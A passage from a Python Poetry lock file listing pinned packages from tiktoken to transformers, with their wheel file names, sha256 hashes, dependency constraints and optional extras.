"sha256:e59db6fca8d5ccea302fe2888917364446d6f4201a25272a1a1c44975c65406a"}, {file = "tiktoken-0.3.3-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:19340d8ba4d6fd729b2e3a096a547ded85f71012843008f97475f9db484869ee"}, {file = "tiktoken-0.3.3-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:542686cbc9225540e3a10f472f82fa2e1bebafce2233a211dee8459e95821cfd"}, {file = "tiktoken-0.3.3-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3a43612b2a09f4787c050163a216bf51123851859e9ab128ad03d2729826cde9"}, {file = "tiktoken-0.3.3-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:a11674f0275fa75fb59941b703650998bd4acb295adbd16fc8af17051aaed19d"}, {file = "tiktoken-0.3.3-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:65fc0a449630bab28c30b4adec257442a4706d79cffc2337c1d9df3e91825cdd"}, {file = "tiktoken-0.3.3-cp39-cp39-win_amd64.whl", hash = "sha256:0b9a7a9a8b781a50ee9289e85e28771d7e113cc0c656eadfb6fc6d3a106ff9bb"}, {file = "tiktoken-0.3.3.tar.gz", hash = "sha256:97b58b7bfda945791ec855e53d166e8ec20c6378942b93851a6c919ddf9d0496"}, ] [package.dependencies] regex = ">=2022.1.18" requests = ">=2.26.0" [package.extras] blobfile = ["blobfile (>=2)"] [[package]] name = "timescale-vector" version = "0.0.1" description = "Python library for storing vector data in Postgres" optional = true python-versions = ">=3.7" files = [ {file = "timescale-vector-0.0.1.tar.gz", hash = "sha256:420d088b1d45e98f5b9770c76ddf826521aa6e813cb4997d24355eaeda1a7775"}, {file = "timescale_vector-0.0.1-py3-none-any.whl", hash = "sha256:81283e8f359387bacd2bd092431a288f34c211968c53b3fed7f3fed1979f39eb"}, ] [package.dependencies] asyncpg = "*" pgvector = "*" psycopg2 = "*" [package.extras] dev = ["python-dotenv"] [[package]] name = "tinycss2" 
version = "1.2.1" description = "A tiny CSS parser" optional = false python-versions = ">=3.7" files = [ {file = "tinycss2-1.2.1-py3-none-any.whl", hash = "sha256:2b80a96d41e7c3914b8cda8bc7f705a4d9c49275616e886103dd839dfc847847"}, {file = "tinycss2-1.2.1.tar.gz", hash = "sha256:8cff3a8f066c2ec677c06dbc7b45619804a6938478d9d73c284b29d14ecb0627"}, ] [package.dependencies] webencodings = ">=0.4" [package.extras] doc = ["sphinx", "sphinx_rtd_theme"] test = ["flake8", "isort", "pytest"] [[package]] name = "tinysegmenter" version = "0.3" description = "Very compact Japanese tokenizer" optional = true python-versions = "*" files = [ {file = "tinysegmenter-0.3.tar.gz", hash = "sha256:ed1f6d2e806a4758a73be589754384cbadadc7e1a414c81a166fc9adf2d40c6d"}, ] [[package]] name = "tldextract" version = "5.0.1" description = "Accurately separates a URL's subdomain, domain, and public suffix, using the Public Suffix List (PSL). By default, this includes the public ICANN TLDs and their exceptions. You can optionally support the Public Suffix List's private domains as well." optional = true python-versions = ">=3.8" files = [ {file = "tldextract-5.0.1-py3-none-any.whl", hash = "sha256:8322fa2b73d9572c6bde31e96f66b694abb86d85b32ed6082593da806a6d33b4"}, {file = "tldextract-5.0.1.tar.gz", hash = "sha256:ac1c5daa02616e9c2608f5fb6dd93049db03d0cf46c7f6fad46e2850a984f019"}, ] [package.dependencies] filelock = ">=3.0.8" idna = "*" requests = ">=2.1.0" requests-file = ">=1.4" [[package]] name = "tokenizers" version = "0.13.3" description = "Fast and Customizable Tokenizers" optional = false python-versions = "*" files = [ {file = "tokenizers-0.13.3-cp310-cp310-macosx_10_11_x86_64.whl", hash = "sha256:f3835c5be51de8c0a092058a4d4380cb9244fb34681fd0a295fbf0a52a5fdf33"}, {file = "tokenizers-0.13.3-cp310-cp310-macosx_12_0_arm64.whl", hash = "sha256:4ef4c3e821730f2692489e926b184321e887f34fb8a6b80b8096b966ba663d07"}, {file = "tokenizers-0.13.3-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c5fd1a6a25353e9aa762e2aae5a1e63883cad9f4e997c447ec39d071020459bc"}, {file = "tokenizers-0.13.3-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:ee0b1b311d65beab83d7a41c56a1e46ab732a9eed4460648e8eb0bd69fc2d059"}, {file = "tokenizers-0.13.3-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:5ef4215284df1277dadbcc5e17d4882bda19f770d02348e73523f7e7d8b8d396"}, {file = "tokenizers-0.13.3-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a4d53976079cff8a033f778fb9adca2d9d69d009c02fa2d71a878b5f3963ed30"}, {file = "tokenizers-0.13.3-cp310-cp310-win32.whl", hash = "sha256:1f0e3b4c2ea2cd13238ce43548959c118069db7579e5d40ec270ad77da5833ce"}, {file = "tokenizers-0.13.3-cp310-cp310-win_amd64.whl", hash = "sha256:89649c00d0d7211e8186f7a75dfa1db6996f65edce4b84821817eadcc2d3c79e"}, {file = "tokenizers-0.13.3-cp311-cp311-macosx_10_11_universal2.whl", hash = "sha256:56b726e0d2bbc9243872b0144515ba684af5b8d8cd112fb83ee1365e26ec74c8"}, {file = "tokenizers-0.13.3-cp311-cp311-macosx_12_0_arm64.whl", hash = "sha256:cc5c022ce692e1f499d745af293ab9ee6f5d92538ed2faf73f9708c89ee59ce6"}, {file = "tokenizers-0.13.3-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f55c981ac44ba87c93e847c333e58c12abcbb377a0c2f2ef96e1a266e4184ff2"}, {file = "tokenizers-0.13.3-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:f247eae99800ef821a91f47c5280e9e9afaeed9980fc444208d5aa6ba69ff148"}, {file = 
"tokenizers-0.13.3-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:4b3e3215d048e94f40f1c95802e45dcc37c5b05eb46280fc2ccc8cd351bff839"}, {file = "tokenizers-0.13.3-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9ba2b0bf01777c9b9bc94b53764d6684554ce98551fec496f71bc5be3a03e98b"}, {file = "tokenizers-0.13.3-cp311-cp311-win32.whl", hash = "sha256:cc78d77f597d1c458bf0ea7c2a64b6aa06941c7a99cb135b5969b0278824d808"}, {file = "tokenizers-0.13.3-cp311-cp311-win_amd64.whl", hash = "sha256:ecf182bf59bd541a8876deccf0360f5ae60496fd50b58510048020751cf1724c"}, {file = "tokenizers-0.13.3-cp37-cp37m-macosx_10_11_x86_64.whl", hash = "sha256:0527dc5436a1f6bf2c0327da3145687d3bcfbeab91fed8458920093de3901b44"}, {file = "tokenizers-0.13.3-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:07cbb2c307627dc99b44b22ef05ff4473aa7c7cc1fec8f0a8b37d8a64b1a16d2"}, {file = "tokenizers-0.13.3-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:4560dbdeaae5b7ee0d4e493027e3de6d53c991b5002d7ff95083c99e11dd5ac0"}, {file = "tokenizers-0.13.3-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:64064bd0322405c9374305ab9b4c07152a1474370327499911937fd4a76d004b"}, {file = "tokenizers-0.13.3-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b8c6e2ab0f2e3d939ca66aa1d596602105fe33b505cd2854a4c1717f704c51de"}, {file = "tokenizers-0.13.3-cp37-cp37m-win32.whl", hash = "sha256:6cc29d410768f960db8677221e497226e545eaaea01aa3613fa0fdf2cc96cff4"}, {file = "tokenizers-0.13.3-cp37-cp37m-win_amd64.whl", hash = "sha256:fc2a7fdf864554a0dacf09d32e17c0caa9afe72baf9dd7ddedc61973bae352d8"}, {file = "tokenizers-0.13.3-cp38-cp38-macosx_10_11_x86_64.whl", hash = "sha256:8791dedba834c1fc55e5f1521be325ea3dafb381964be20684b92fdac95d79b7"}, {file = "tokenizers-0.13.3-cp38-cp38-macosx_12_0_arm64.whl", hash = "sha256:d607a6a13718aeb20507bdf2b96162ead5145bbbfa26788d6b833f98b31b26e1"}, {file = "tokenizers-0.13.3-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3791338f809cd1bf8e4fee6b540b36822434d0c6c6bc47162448deee3f77d425"}, {file = "tokenizers-0.13.3-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:c2f35f30e39e6aab8716f07790f646bdc6e4a853816cc49a95ef2a9016bf9ce6"}, {file = "tokenizers-0.13.3-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:310204dfed5aa797128b65d63538a9837cbdd15da2a29a77d67eefa489edda26"}, {file = "tokenizers-0.13.3-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a0f9b92ea052305166559f38498b3b0cae159caea712646648aaa272f7160963"}, {file = "tokenizers-0.13.3-cp38-cp38-win32.whl", hash = "sha256:9a3fa134896c3c1f0da6e762d15141fbff30d094067c8f1157b9fdca593b5806"}, {file = "tokenizers-0.13.3-cp38-cp38-win_amd64.whl", hash = "sha256:8e7b0cdeace87fa9e760e6a605e0ae8fc14b7d72e9fc19c578116f7287bb873d"}, {file = "tokenizers-0.13.3-cp39-cp39-macosx_10_11_x86_64.whl", hash = "sha256:00cee1e0859d55507e693a48fa4aef07060c4bb6bd93d80120e18fea9371c66d"}, {file = "tokenizers-0.13.3-cp39-cp39-macosx_12_0_arm64.whl", hash = "sha256:a23ff602d0797cea1d0506ce69b27523b07e70f6dda982ab8cf82402de839088"}, {file = "tokenizers-0.13.3-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:70ce07445050b537d2696022dafb115307abdffd2a5c106f029490f84501ef97"}, {file = "tokenizers-0.13.3-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = 
"sha256:280ffe95f50eaaf655b3a1dc7ff1d9cf4777029dbbc3e63a74e65a056594abc3"}, {file = "tokenizers-0.13.3-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:97acfcec592f7e9de8cadcdcda50a7134423ac8455c0166b28c9ff04d227b371"}, {file = "tokenizers-0.13.3-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:dd7730c98a3010cd4f523465867ff95cd9d6430db46676ce79358f65ae39797b"}, {file = "tokenizers-0.13.3-cp39-cp39-win32.whl", hash = "sha256:48625a108029cb1ddf42e17a81b5a3230ba6888a70c9dc14e81bc319e812652d"}, {file = "tokenizers-0.13.3-cp39-cp39-win_amd64.whl", hash = "sha256:bc0a6f1ba036e482db6453571c9e3e60ecd5489980ffd95d11dc9f960483d783"}, {file = "tokenizers-0.13.3.tar.gz", hash = "sha256:2e546dbb68b623008a5442353137fbb0123d311a6d7ba52f2667c8862a75af2e"}, ] [package.extras] dev = ["black (==22.3)", "datasets", "numpy", "pytest", "requests"] docs = ["setuptools-rust", "sphinx", "sphinx-rtd-theme"] testing = ["black (==22.3)", "datasets", "numpy", "pytest", "requests"] [[package]] name = "toml" version = "0.10.2" description = "Python Library for Tom's Obvious, Minimal Language" optional = false python-versions = ">=2.6, !=3.0.*, !=3.1.*, !=3.2.*" files = [ {file = "toml-0.10.2-py2.py3-none-any.whl", hash = "sha256:806143ae5bfb6a3c6e736a764057db0e6a0e05e338b5630894a5f779cabb4f9b"}, {file = "toml-0.10.2.tar.gz", hash = "sha256:b3bda1d108d5dd99f4a20d24d9c348e91c4db7ab1b749200bded2f839ccbe68f"}, ] [[package]] name = "tomli" version = "2.0.1" description = "A lil' TOML parser" optional = false python-versions = ">=3.7" files = [ {file = "tomli-2.0.1-py3-none-any.whl", hash = "sha256:939de3e7a6161af0c887ef91b7d41a53e7c5a1ca976325f429cb46ea9bc30ecc"}, {file = "tomli-2.0.1.tar.gz", hash = "sha256:de526c12914f0c550d15924c62d72abc48d6fe7364aa87328337a31007fe8a4f"}, ] [[package]] name = "toolz" version = "0.12.0" description = "List processing tools and functional utilities" optional = true python-versions = ">=3.5" files = [ {file = "toolz-0.12.0-py3-none-any.whl", hash = "sha256:2059bd4148deb1884bb0eb770a3cde70e7f954cfbbdc2285f1f2de01fd21eb6f"}, {file = "toolz-0.12.0.tar.gz", hash = "sha256:88c570861c440ee3f2f6037c4654613228ff40c93a6c25e0eba70d17282c6194"}, ] [[package]] name = "torch" version = "1.13.1" description = "Tensors and Dynamic neural networks in Python with strong GPU acceleration" optional = true python-versions = ">=3.7.0" files = [ {file = "torch-1.13.1-cp310-cp310-manylinux1_x86_64.whl", hash = "sha256:fd12043868a34a8da7d490bf6db66991108b00ffbeecb034228bfcbbd4197143"}, {file = "torch-1.13.1-cp310-cp310-manylinux2014_aarch64.whl", hash = "sha256:d9fe785d375f2e26a5d5eba5de91f89e6a3be5d11efb497e76705fdf93fa3c2e"}, {file = "torch-1.13.1-cp310-cp310-win_amd64.whl", hash = "sha256:98124598cdff4c287dbf50f53fb455f0c1e3a88022b39648102957f3445e9b76"}, {file = "torch-1.13.1-cp310-none-macosx_10_9_x86_64.whl", hash = "sha256:393a6273c832e047581063fb74335ff50b4c566217019cc6ace318cd79eb0566"}, {file = "torch-1.13.1-cp310-none-macosx_11_0_arm64.whl", hash = "sha256:0122806b111b949d21fa1a5f9764d1fd2fcc4a47cb7f8ff914204fd4fc752ed5"}, {file = "torch-1.13.1-cp311-cp311-manylinux1_x86_64.whl", hash = "sha256:22128502fd8f5b25ac1cd849ecb64a418382ae81dd4ce2b5cebaa09ab15b0d9b"}, {file = "torch-1.13.1-cp37-cp37m-manylinux1_x86_64.whl", hash = "sha256:76024be052b659ac1304ab8475ab03ea0a12124c3e7626282c9c86798ac7bc11"}, {file = "torch-1.13.1-cp37-cp37m-manylinux2014_aarch64.whl", hash = "sha256:ea8dda84d796094eb8709df0fcd6b56dc20b58fdd6bc4e8d7109930dafc8e419"}, {file = 
"torch-1.13.1-cp37-cp37m-win_amd64.whl", hash = "sha256:2ee7b81e9c457252bddd7d3da66fb1f619a5d12c24d7074de91c4ddafb832c93"}, {file = "torch-1.13.1-cp37-none-macosx_10_9_x86_64.whl", hash = "sha256:0d9b8061048cfb78e675b9d2ea8503bfe30db43d583599ae8626b1263a0c1380"}, {file = "torch-1.13.1-cp37-none-macosx_11_0_arm64.whl", hash = "sha256:f402ca80b66e9fbd661ed4287d7553f7f3899d9ab54bf5c67faada1555abde28"}, {file = "torch-1.13.1-cp38-cp38-manylinux1_x86_64.whl", hash = "sha256:727dbf00e2cf858052364c0e2a496684b9cb5aa01dc8a8bc8bbb7c54502bdcdd"}, {file = "torch-1.13.1-cp38-cp38-manylinux2014_aarch64.whl", hash = "sha256:df8434b0695e9ceb8cc70650afc1310d8ba949e6db2a0525ddd9c3b2b181e5fe"}, {file = "torch-1.13.1-cp38-cp38-win_amd64.whl", hash = "sha256:5e1e722a41f52a3f26f0c4fcec227e02c6c42f7c094f32e49d4beef7d1e213ea"}, {file = "torch-1.13.1-cp38-none-macosx_10_9_x86_64.whl", hash = "sha256:33e67eea526e0bbb9151263e65417a9ef2d8fa53cbe628e87310060c9dcfa312"}, {file = "torch-1.13.1-cp38-none-macosx_11_0_arm64.whl", hash = "sha256:eeeb204d30fd40af6a2d80879b46a7efbe3cf43cdbeb8838dd4f3d126cc90b2b"}, {file = "torch-1.13.1-cp39-cp39-manylinux1_x86_64.whl", hash = "sha256:50ff5e76d70074f6653d191fe4f6a42fdbe0cf942fbe2a3af0b75eaa414ac038"}, {file = "torch-1.13.1-cp39-cp39-manylinux2014_aarch64.whl", hash = "sha256:2c3581a3fd81eb1f0f22997cddffea569fea53bafa372b2c0471db373b26aafc"}, {file = "torch-1.13.1-cp39-cp39-win_amd64.whl", hash = "sha256:0aa46f0ac95050c604bcf9ef71da9f1172e5037fdf2ebe051962d47b123848e7"}, {file = "torch-1.13.1-cp39-none-macosx_10_9_x86_64.whl", hash = "sha256:6930791efa8757cb6974af73d4996b6b50c592882a324b8fb0589c6a9ba2ddaf"}, {file = "torch-1.13.1-cp39-none-macosx_11_0_arm64.whl", hash = "sha256:e0df902a7c7dd6c795698532ee5970ce898672625635d885eade9976e5a04949"}, ] [package.dependencies] nvidia-cublas-cu11 = {version = "11.10.3.66", markers = "platform_system == \"Linux\""} nvidia-cuda-nvrtc-cu11 = {version = "11.7.99", markers = "platform_system == \"Linux\""} nvidia-cuda-runtime-cu11 = {version = "11.7.99", markers = "platform_system == \"Linux\""} nvidia-cudnn-cu11 = {version = "8.5.0.96", markers = "platform_system == \"Linux\""} typing-extensions = "*" [package.extras] opt-einsum = ["opt-einsum (>=3.3)"] [[package]] name = "torchvision" version = "0.14.1" description = "image and video datasets and models for torch deep learning" optional = true python-versions = ">=3.7" files = [ {file = "torchvision-0.14.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:eeb05dd9dd3af5428fee525400759daf8da8e4caec45ddd6908cfb36571f6433"}, {file = "torchvision-0.14.1-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:8d0766ea92affa7af248e327dd85f7c9cfdf51a57530b43212d4e1858548e9d7"}, {file = "torchvision-0.14.1-cp310-cp310-manylinux1_x86_64.whl", hash = "sha256:6d7b35653113664ea3fdcb71f515cfbf29d2fe393000fd8aaff27a1284de6908"}, {file = "torchvision-0.14.1-cp310-cp310-manylinux2014_aarch64.whl", hash = "sha256:8a9eb773a2fa8f516e404ac09c059fb14e6882c48fdbb9c946327d2ce5dba6cd"}, {file = "torchvision-0.14.1-cp310-cp310-win_amd64.whl", hash = "sha256:13986f0c15377ff23039e1401012ccb6ecf71024ce53def27139e4eac5a57592"}, {file = "torchvision-0.14.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:fb7a793fd33ce1abec24b42778419a3fb1e3159d7dfcb274a3ca8fb8cbc408dc"}, {file = "torchvision-0.14.1-cp37-cp37m-manylinux1_x86_64.whl", hash = "sha256:89fb0419780ec9a9eb9f7856a0149f6ac9f956b28f44b0c0080c6b5b48044db7"}, {file = "torchvision-0.14.1-cp37-cp37m-manylinux2014_aarch64.whl", hash = 
"sha256:a2d4237d3c9705d7729eb4534e4eb06f1d6be7ff1df391204dfb51586d9b0ecb"}, {file = "torchvision-0.14.1-cp37-cp37m-win_amd64.whl", hash = "sha256:92a324712a87957443cc34223274298ae9496853f115c252f8fc02b931f2340e"}, {file = "torchvision-0.14.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:68ed03359dcd3da9cd21b8ab94da21158df8a6a0c5bad0bf4a42f0e448d28cb3"}, {file = "torchvision-0.14.1-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:30fcf0e9fe57d4ac4ce6426659a57dce199637ccb6c70be1128670f177692624"}, {file = "torchvision-0.14.1-cp38-cp38-manylinux1_x86_64.whl", hash = "sha256:0ed02aefd09bf1114d35f1aa7dce55aa61c2c7e57f9aa02dce362860be654e85"}, {file = "torchvision-0.14.1-cp38-cp38-manylinux2014_aarch64.whl", hash = "sha256:a541e49fc3c4e90e49e6988428ab047415ed52ea97d0c0bfd147d8bacb8f4df8"}, {file = "torchvision-0.14.1-cp38-cp38-win_amd64.whl", hash = "sha256:6099b3191dc2516099a32ae38a5fb349b42e863872a13545ab1a524b6567be60"}, {file = "torchvision-0.14.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:c5e744f56e5f5b452deb5fc0f3f2ba4d2f00612d14d8da0dbefea8f09ac7690b"}, {file = "torchvision-0.14.1-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:758b20d079e810b4740bd60d1eb16e49da830e3360f9be379eb177ee221fa5d4"}, {file = "torchvision-0.14.1-cp39-cp39-manylinux1_x86_64.whl", hash = "sha256:83045507ef8d3c015d4df6be79491375b2f901352cfca6e72b4723e9c4f9a55d"}, {file = "torchvision-0.14.1-cp39-cp39-manylinux2014_aarch64.whl", hash = "sha256:eaed58cf454323ed9222d4e0dd5fb897064f454b400696e03a5200e65d3a1e76"}, {file = "torchvision-0.14.1-cp39-cp39-win_amd64.whl", hash = "sha256:b337e1245ca4353623dd563c03cd8f020c2496a7c5d12bba4d2e381999c766e0"}, ] [package.dependencies] numpy = "*" pillow = ">=5.3.0,<8.3.dev0 || >=8.4.dev0" requests = "*" torch = "1.13.1" typing-extensions = "*" [package.extras] scipy = ["scipy"] [[package]] name = "tornado" version = "6.3.3" description = "Tornado is a Python web framework and asynchronous networking library, originally developed at FriendFeed." 
optional = false python-versions = ">= 3.8" files = [ {file = "tornado-6.3.3-cp38-abi3-macosx_10_9_universal2.whl", hash = "sha256:502fba735c84450974fec147340016ad928d29f1e91f49be168c0a4c18181e1d"}, {file = "tornado-6.3.3-cp38-abi3-macosx_10_9_x86_64.whl", hash = "sha256:805d507b1f588320c26f7f097108eb4023bbaa984d63176d1652e184ba24270a"}, {file = "tornado-6.3.3-cp38-abi3-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1bd19ca6c16882e4d37368e0152f99c099bad93e0950ce55e71daed74045908f"}, {file = "tornado-6.3.3-cp38-abi3-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:7ac51f42808cca9b3613f51ffe2a965c8525cb1b00b7b2d56828b8045354f76a"}, {file = "tornado-6.3.3-cp38-abi3-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:71a8db65160a3c55d61839b7302a9a400074c9c753040455494e2af74e2501f2"}, {file = "tornado-6.3.3-cp38-abi3-musllinux_1_1_aarch64.whl", hash = "sha256:ceb917a50cd35882b57600709dd5421a418c29ddc852da8bcdab1f0db33406b0"}, {file = "tornado-6.3.3-cp38-abi3-musllinux_1_1_i686.whl", hash = "sha256:7d01abc57ea0dbb51ddfed477dfe22719d376119844e33c661d873bf9c0e4a16"}, {file = "tornado-6.3.3-cp38-abi3-musllinux_1_1_x86_64.whl", hash = "sha256:9dc4444c0defcd3929d5c1eb5706cbe1b116e762ff3e0deca8b715d14bf6ec17"}, {file = "tornado-6.3.3-cp38-abi3-win32.whl", hash = "sha256:65ceca9500383fbdf33a98c0087cb975b2ef3bfb874cb35b8de8740cf7f41bd3"}, {file = "tornado-6.3.3-cp38-abi3-win_amd64.whl", hash = "sha256:22d3c2fa10b5793da13c807e6fc38ff49a4f6e1e3868b0a6f4164768bb8e20f5"}, {file = "tornado-6.3.3.tar.gz", hash = "sha256:e7d8db41c0181c80d76c982aacc442c0783a2c54d6400fe028954201a2e032fe"}, ] [[package]] name = "tqdm" version = "4.66.1" description = "Fast, Extensible Progress Meter" optional = false python-versions = ">=3.7" files = [ {file = "tqdm-4.66.1-py3-none-any.whl", hash = "sha256:d302b3c5b53d47bce91fea46679d9c3c6508cf6332229aa1e7d8653723793386"}, {file = "tqdm-4.66.1.tar.gz", hash = "sha256:d88e651f9db8d8551a62556d3cff9e3034274ca5d66e93197cf2490e2dcb69c7"}, ] [package.dependencies] colorama = {version = "*", markers = "platform_system == \"Windows\""} [package.extras] dev = ["pytest (>=6)", "pytest-cov", "pytest-timeout", "pytest-xdist"] notebook = ["ipywidgets (>=6)"] slack = ["slack-sdk"] telegram = ["requests"] [[package]] name = "traitlets" version = "5.12.0" description = "Traitlets Python configuration system" optional = false python-versions = ">=3.8" files = [ {file = "traitlets-5.12.0-py3-none-any.whl", hash = "sha256:81539f07f7aebcde2e4b5ab76727f53eabf18ad155c6ed7979a681411602fa47"}, {file = "traitlets-5.12.0.tar.gz", hash = "sha256:833273bf645d8ce31dcb613c56999e2e055b1ffe6d09168a164bcd91c36d5d35"}, ] [package.extras] docs = ["myst-parser", "pydata-sphinx-theme", "sphinx"] test = ["argcomplete (>=3.0.3)", "mypy (>=1.6.0)", "pre-commit", "pytest (>=7.0,<7.5)", "pytest-mock", "pytest-mypy-testing"] [[package]] name = "transformers" version = "4.33.3" description = "State-of-the-art Machine Learning for JAX, PyTorch and TensorFlow" optional = true python-versions = ">=3.8.0" files = [ {file = "transformers-4.33.3-py3-none-any.whl", hash = "sha256:7150bbf6781ddb3338ce7d74f4d6f557e6c236a0a1dd3de57412214caae7fd71"}, {file = "transformers-4.33.3.tar.gz", hash = "sha256:8ea7c92310dee7c63b14766ce928218f7a9177960b2487ac018c91ae621af03e"}, ] [package.dependencies] filelock = "*" huggingface-hub = ">=0.15.1,<1.0" numpy = ">=1.17" packaging = ">=20.0" pyyaml = ">=5.1" regex = "!=2019.12.17" 
requests = "*" safetensors = ">=0.3.1" tokenizers = ">=0.11.1,<0.11.3 || >0.11.3,<0.14" tqdm = ">=4.27" [package.extras] accelerate = ["accelerate (>=0.20.3)"] agents = ["Pillow (<10.0.0)", "accelerate (>=0.20.3)", "datasets (!=2.5.0)", "diffusers", "opencv-python", "sentencepiece (>=0.1.91,!=0.1.92)", "torch (>=1.10,!=1.12.0)"] all = ["Pillow (<10.0.0)", "accelerate (>=0.20.3)", "av (==9.2.0)", "codecarbon (==1.2.0)", "decord (==0.6.0)", "flax (>=0.4.1,<=0.7.0)", "jax (>=0.4.1,<=0.4.13)", "jaxlib (>=0.4.1,<=0.4.13)", "kenlm", "keras-nlp (>=0.3.1)", "librosa", "onnxconverter-common", "optax (>=0.0.8,<=0.1.4)", "optuna", "phonemizer", "protobuf", "pyctcdecode (>=0.4.0)", "ray[tune]", "sentencepiece (>=0.1.91,!=0.1.92)", "sigopt", "tensorflow (>=2.6,<2.15)", "tensorflow-text (<2.15)", "tf2onnx", "timm", "tokenizers (>=0.11.1,!=0.11.3,<0.14)", "torch (>=1.10,!=1.12.0)", "torchaudio", "torchvision"] audio = ["kenlm", "librosa", "phonemizer", "pyctcdecode (>=0.4.0)"] codecarbon = ["codecarbon (==1.2.0)"] deepspeed = ["accelerate (>=0.20.3)", "deepspeed (>=0.9.3)"] deepspeed-testing = ["GitPython (<3.1.19)", "accelerate (>=0.20.3)", "beautifulsoup4", "black (>=23.1,<24.0)", "cookiecutter (==1.7.3)", "datasets (!=2.5.0)", "deepspeed (>=0.9.3)", "dill (<0.3.5)", "evaluate (>=0.2.0)", "faiss-cpu", "hf-doc-builder (>=0.3.0)", "nltk", "optuna", "parameterized", "protobuf", "psutil", "pytest (>=7.2.0)", "pytest-timeout", "pytest-xdist", "rjieba", "rouge-score (!=0.0.7,!=0.0.8,!=0.1,!=0.1.1)", "sacrebleu (>=1.4.12,<2.0.0)", "sacremoses", "sentencepiece (>=0.1.91,!=0.1.92)", "timeout-decorator"] dev = ["GitPython (<3.1.19)", "Pillow (<10.0.0)", "accelerate (>=0.20.3)", "av (==9.2.0)", "beautifulsoup4", "black (>=23.1,<24.0)", "codecarbon (==1.2.0)", "cookiecutter (==1.7.3)", "datasets (!=2.5.0)", "decord (==0.6.0)", "dill (<0.3.5)", "evaluate (>=0.2.0)", "faiss-cpu", "flax (>=0.4.1,<=0.7.0)", "fugashi (>=1.0)", "hf-doc-builder", "hf-doc-builder (>=0.3.0)", "ipadic (>=1.0.0,<2.0)", "isort (>=5.5.4)", "jax (>=0.4.1,<=0.4.13)", "jaxlib (>=0.4.1,<=0.4.13)", "kenlm", "keras-nlp (>=0.3.1)", "librosa", "nltk", "onnxconverter-common", "optax (>=0.0.8,<=0.1.4)", "optuna", "parameterized", "phonemizer", "protobuf", "psutil", "pyctcdecode (>=0.4.0)", "pytest (>=7.2.0)", "pytest-timeout", "pytest-xdist", "ray[tune]", "rhoknp (>=1.1.0,<1.3.1)", "rjieba", "rouge-score (!=0.0.7,!=0.0.8,!=0.1,!=0.1.1)", "ruff (>=0.0.241,<=0.0.259)", "sacrebleu (>=1.4.12,<2.0.0)", "sacremoses", "scikit-learn", "sentencepiece (>=0.1.91,!=0.1.92)", "sigopt", "sudachidict-core (>=20220729)", "sudachipy (>=0.6.6)", "tensorflow (>=2.6,<2.15)", "tensorflow-text (<2.15)", "tf2onnx", "timeout-decorator", "timm", "tokenizers (>=0.11.1,!=0.11.3,<0.14)", "torch (>=1.10,!=1.12.0)", "torchaudio", "torchvision", "unidic (>=1.0.2)", "unidic-lite (>=1.0.7)", "urllib3 (<2.0.0)"] dev-tensorflow = ["GitPython (<3.1.19)", "Pillow (<10.0.0)", "beautifulsoup4", "black (>=23.1,<24.0)", "cookiecutter (==1.7.3)", "datasets (!=2.5.0)", "dill (<0.3.5)", "evaluate (>=0.2.0)", "faiss-cpu", "hf-doc-builder", "hf-doc-builder (>=0.3.0)", "isort (>=5.5.4)", "kenlm", "keras-nlp (>=0.3.1)", "librosa", "nltk", "onnxconverter-common", "onnxruntime (>=1.4.0)", "onnxruntime-tools (>=1.4.2)", "parameterized", "phonemizer", "protobuf", "psutil", "pyctcdecode (>=0.4.0)", "pytest (>=7.2.0)", "pytest-timeout", "pytest-xdist", "rjieba", "rouge-score (!=0.0.7,!=0.0.8,!=0.1,!=0.1.1)", "ruff (>=0.0.241,<=0.0.259)", "sacrebleu (>=1.4.12,<2.0.0)", "sacremoses", "scikit-learn", 
